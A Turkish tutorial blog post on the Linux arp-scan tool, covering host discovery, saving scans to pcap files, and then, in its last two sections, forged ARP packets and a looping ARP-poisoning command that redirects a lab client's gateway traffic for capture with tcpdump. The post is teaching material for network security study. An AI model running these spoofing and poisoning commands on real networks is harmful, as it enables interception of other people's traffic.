Linux arp-scan Aracı ile Yerel Ağda ARP Sorgularının Gerçekleştirilmesi

Yerel ağda iletişimi gerçekleştirmek için IP adresleri yerine düğümlerin fiziksel adresleri kullanılır. Yerel ağdaki düğümlerin birbirini tanımaları ve iletişimi ARP (Address Resolution Protocol) üzerinden gerçekleşir. Bu yazıda Linux arp-scan aracı ile yerel ağda ARP iletişimi incelenecektir.

 

Linux arp-scan aracının temel kullanımı aşağıdaki gibidir.

arp-scan –h

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-01

 

ARP iletişimin yapılacağı ethernet kartı tespit edilmesi gerekir. Birden fazla ağ kartı varsa, tarama yapılacak ağda bulunan ağ kartı seçilecektir.

ifconfig

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-02

 

Bu yazıda ARP sorgularının gerçekleştirileceği ağ 100.100.200.0/24, ağ kartı eth0, ağ kartına ait MAC adresi 00:50:56:95:0E:D4, ağ kartına ait IP adresi 100.100.200.210, ağın gateway adresi 100.100.200.1’dir.

 

1) IP Aralığını İnceleme

Aracın temel kullanımında arayüz (eth0) ve ARP sorgularının gönderileceği IP listesi belirtilebilir.

arp-scan -I eth0 100.100.200.10-100.100.200.55

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-03

 

ARP sorgusunu alan ağdaki istemcinin ARP belleğine, sorguyu gönderen tarafın MAC adres ve IP bilgisi düşer. Sorgulamadan önce ağdaki 100.100.200.50 IP adresli istemcide 100.100.200.210’un MAC adresi yokken, ARP sorgusu sonrasında IP ve MAC adresi ARP önbelleğine kaydedilmiştir.

arp -a

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-04

 

2) Tüm Ağı Tarama ve Sonuçları Dosyaya Aktarma

Linux arp-scan aracının gerçekleştirdiği trafiğe ait paketler bir dosyaya da aktarılabilir.

arp-scan -I eth0 100.100.200.0/24 –retry=1 –pcapsavefile=/root/Desktop/ArpTaramasi.pcap

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-05

 

Not: Varsayılan olarak arp-scan aracı ile ağa 3 adet ARP sorgu paketi gönderilir. “–retry ” ile ARP sorgu adedi belirtilebilir.

Paket içerisinde sorgulara ait cevaplar listelenmiştir.

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-06

 

Cevap gelen ARP paketleri yerine bütün ARP paketlerini görmek için Linux tcpdump aracı kullanılabilir.

tcpdump -vv -i eth0 arp -w /root/Desktop/ArpTaramasi_Tcpdump.pcap

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-07

 

Tüm ağı taramak için “–localnet” kullanılabilir.

arp-scan –interface=eth0 –localnet –retry=1

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-08

 

Paket dinleme işlemi durdurulabilir.

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-09

 

Böylece sonuçlar dosyaya kaydedilmiştir.

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-10

 

3) Sahte IP ve MAC ile ARP Paketleri Gönderme

ARP iletişiminde kimlik doğrulaması olmadığı için herhangi bir IP veya MAC adresinden gönderiliyormuş gibi ARP sorgusu da gerçekleştirilebilir.

arp-scan –interface=eth0 –localnet –arpspa=100.100.200.40 –arpsha=AA:BB:CC:DD:EE:FF

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-11

 

Tcpdump ile bu trafik başka bir dosyaya kaydedilebilir. Belirtilen IP ve MAC olarak ARP sorguları gönderilmiştir.

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-12

 

Ağdaki istemci de bu değerleri ARP tablosuna eklemiş olur.

arp -a

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-13

 

4) Ağdaki İstemcinin Ağ Dışına Gönderdiği Paketlerin Elde Edilmesi

İstemci bilgisayarın tüm trafiği Kali bilgisayar üzerine alınabilir. Ağdaki istemci bilgisayarın IP yapılandırması aşağıdaki gibidir.

ipconfig /all

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-14

 

Eğer istemcinin gateway IP adresine (100.100.200.1) ait MAC adresi; Kali’nin MAC (00:50:56:95:0E:D4) gibi gösterilirse, istemcinin ağ dışındaki trafiği Kali üzerinden geçecektir. Sahte MAC adresi aşağıdaki gibi yayın edilebilir.

arp-scan –interface=eth0 –localnet –arpspa=100.100.200.1 –arpsha=00:50:56:95:0E:D4

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-15

 

Böylece istemcinin ARP belleği değiştirilmiş olur. Gateway IP adresi (100.100.200.1) için, sahte ARP paketleri gönderilmeden önceki MAC adresi (00:50:56:95:28:9A) ve gönderildikten sonraki MAC adresi (00:50:56:95:0E:D4) aşağıdaki gibidir.

arp -a

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-16

 

Zehirlenme sırasında istemci taraf ARP sorgusunu bir daha başlatarak Gateway IP adresinin MAC adresini doğru bir şekilde öğrenebilir. Bu sebeple, arp-scan ile ARP zehirlemesi sürekli olmalıdır.

while true; do arp-scan –interface=eth0 100.100.200.50  –arpspa=100.100.200.1 –arpsha=00:50:56:95:0e:d4; sleep 1; done;

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-18

 

Zehirleme işlemi devam ederken, Tcpdump aracı ile istemcinin yaptığı trafik kaydedilebilir.

tcpdump -vv -i eth0 -w /root/Desktop/ArpTaramasi_ArayaGirme_HTTP.pcap

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-19

 

Trafik Kali üzerine gelmiş ancak Kali gelen paketleri hedefe yönlendirmediği ve gelen cevapları da kaynağa geri iletmediği için trafik Kali üzerinde sonlanmıştır.

discovering-live-systems-on-local-network-by-using-linux-arp-scan-tool-20

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.